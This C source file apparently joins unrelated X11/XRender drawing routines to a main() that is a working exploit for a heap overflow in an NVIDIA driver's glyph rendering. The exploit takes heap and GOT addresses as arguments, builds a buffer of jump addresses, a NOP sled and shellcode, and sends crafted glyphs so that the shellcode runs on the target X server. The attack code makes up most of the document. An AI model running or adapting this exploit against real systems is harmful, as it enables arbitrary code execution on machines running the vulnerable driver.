void
draw_point(int x, int y, int width, int size, XftColor *color)
{
XPointDouble p[4];
p[0].x = x - size;
p[0].y = y - 1;
p[1].x = x - size;
p[1].y = y + 1;
p[2].x = x + size;
p[2].y = y + 1;
p[3].x = x + size;
p[3].y = y - 1;
XRenderCompositeDoublePoly(display, PictOpOver,
XftDrawSrcPicture(draw, color),
XftDrawPicture(draw),
XRenderFindStandardFormat(display, PictStandardA8),
0, 0, 0, 0, p, 4, 0);
p[0].x = x - 1;
p[0].y = y - size;
p[1].x = x + 1;
p[1].y = y - size;
p[2].x = x + 1;
p[2].y = y + size;
p[3].x = x - 1;
p[3].y = y + size;
XRenderCompositeDoublePoly(display, PictOpOver,
XftDrawSrcPicture(draw, color),
XftDrawPicture(draw),
XRenderFindStandardFormat(display, PictStandardA8),
0, 0, 0, 0, p, 4, 0);
}
void
DoFixedTrapezoids(XParms xp, Parms p, int reps)
{
int i;
Picture white, black, src, dst;
white = XftDrawSrcPicture (aadraw, &aawhite);
black = XftDrawSrcPicture (aadraw, &aablack);
dst = XftDrawPicture (aadraw);
src = black;
for (i = 0; i != reps; i++) {
XRenderCompositeTrapezoids (xp->d, PictOpOver, src, dst, maskFormat,
0, 0, traps, p->objects);
if (src == black)
src = white;
else
src = black;
CheckAbort ();
}
}
int
main(int argc, char *argv[])
{
Display *display;
Widget toplevel;
XtAppContext app_con;
XEvent event;
char c, *string;
unsigned int i;
XDataStr *data;
XExposeEvent *expose = (XExposeEvent *)&event;
unsigned int heapaddr, gotaddr;
if (argc > 2)
{
heapaddr = strtoul(argv[1],NULL,0);
gotaddr = strtoul(argv[2],NULL,0);
}
else
{
printf("Usage: %s <HEAPADDR> <GOTADDR>\n\n", argv[0]);
return 0;
}
toplevel = XtAppInitialize(&app_con, "XSafe", NULL, 0,
&argc, argv, NULL, NULL, 0);
display = XtDisplay(toplevel);
data = (XDataStr *)malloc(sizeof(XDataStr));
if (data == NULL) {
perror("malloc");
exit(EXIT_FAILURE);
}
data->display = display;
data->app = app_con;
if (createWin(data) < 0) {
fprintf(stderr, "can't create Data Window");
exit(EXIT_FAILURE);
}
show(data);
signal(SIGINT, sigHandler);
signal(SIGHUP, sigHandler);
signal(SIGQUIT, sigHandler);
signal(SIGTERM, sigHandler);
/************************************************************************
* BEGIN FONT HEAP OVERFLOW SETUP CODE
*
* "It's so hard to write a graphics driver that open-sourcing it would
* not help."
* - Andrew Fear, Software Product Manager (NVIDIA Corporation).
**********************************************************************/
XGlyphInfo * glyphs;
XRenderPictFormat fmt;
XRenderPictFormat *mask = 0;
GlyphSet gset;
char * buf =0;
int offset, cr, numB;
int xscreenpos = 32680;
int magic_len = 32768 - xscreenpos;
int wr_addr_len = 3548;
int wr_nop_len = 200;
/* Calculate the offset to the Global Offset Table.
* 0x2C0000 is the size of the buffer the NVIDIA driver
* allocates for us when it is about to draw.
*/
offset = gotaddr-(heapaddr-0x2C0000);
offset += magic_len;
glyphs = malloc(sizeof(XGlyphInfo)*3);
/* Payload glyph */
glyphs[0].width = 0x4000; /* One contiguous buffer of 16K... way more than necessary */
glyphs[0].height = 1;
glyphs[0].yOff = 0;
glyphs[0].xOff = glyphs[0].width;
glyphs[0].x = 0;
glyphs[0].y = 0;
/* Large offset glyph (untweaked) */
glyphs[1].width=0;
glyphs[1].height=0;
glyphs[1].yOff=32767;
glyphs[1].xOff=0;
glyphs[1].x = 0;
glyphs[1].y = 0;
/* Small offset glyph (tweaked) */
glyphs[2].width=0;
glyphs[2].height=0;
glyphs[2].yOff=0;
glyphs[2].xOff=0;
glyphs[2].x = 0;
glyphs[2].y = 0;
fmt.type = PictTypeDirect;
fmt.depth = 8;
Glyph * xglyphids = malloc(3*sizeof(Glyph));
xglyphids[0] = 'A';
xglyphids[1] = 'B';
xglyphids[2] = 'C';
int stride = ((glyphs[0].width*1)+3)&~3; /* Needs to be DWORD aligned */
int bufsize = stride*glyphs[0].height;
buf = malloc(bufsize);
/* Write jump address to the buffer a number of times */
for (cr=0; cr<wr_addr_len; cr+=4)
{
*((unsigned int*)((unsigned char*)buf + cr)) = gotaddr+wr_addr_len+4;
}
/* Write the NOP instructions until wr_nop_len */
memset(buf+wr_addr_len, 0x90 /* NOP */, wr_nop_len);
/* Write the shellcode */
cr+=wr_nop_len;
memcpy(buf+cr, shellcode, sizeof(shellcode));
/* Calculate the number of B's required to send */
numB = offset / (glyphs[1].yOff * magic_len);
/* We send only one C, but we change its yOff value according to
* how much space we have left before we meet the correct index length */
glyphs[2].yOff = (offset - (numB * glyphs[1].yOff * magic_len)) / (magic_len);
/* Now create a new buffer for the string data */
string = malloc(numB+1/*numC*/+1/*numA*/+1/*NULL*/);
for (cr=0; cr<numB; cr++) string[cr] = 'B';
string[cr] = 'C'; cr++;
string[cr] = 'A'; cr++;
string[cr] = 0;
mask = XRenderFindFormat(display, PictFormatType|PictFormatDepth, &fmt, 0);
gset = XRenderCreateGlyphSet(display, mask);
if (mask)
{
/* Ask the server to tie the glyphs to the glyphset we created,
* with our addr/nopslide/shellcode buffer as the alpha data.
*/
XRenderAddGlyphs(display, gset, xglyphids, glyphs, 3, buf, bufsize);
}
/* END FONT HEAP OVERFLOW SETUP CODE */
done = 0;
while (!done) {
XNextEvent(display, &event);
switch(event.type) {
case KeyPress:
i = XLookupString(&event.xkey, &c, 1, NULL, NULL);
if ((i == 1) && ((c == 'q') || (c == 'Q'))) {
done = 1;
}
break;
case Expose:
XftDrawRect(data->draw, &data->bg,
expose->x, expose->y,
expose->width, expose->height);
/* Send malignant glyphs and execute shellcode on target */
XRenderCompositeString8(display, PictOpOver,
XftDrawSrcPicture(data->draw, &data->color),
XftDrawPicture(data->draw), mask, gset,
0, 0, xscreenpos, 0, string, strlen(string));
break;
}
}
free(glyphs);
free(xglyphids);
free(buf);
free(string);
XFlush(display);
XUnmapWindow(data->display, data->win);
XUngrabKeyboard(data->display, CurrentTime);
XCloseDisplay(display);
exit(EXIT_SUCCESS);
}
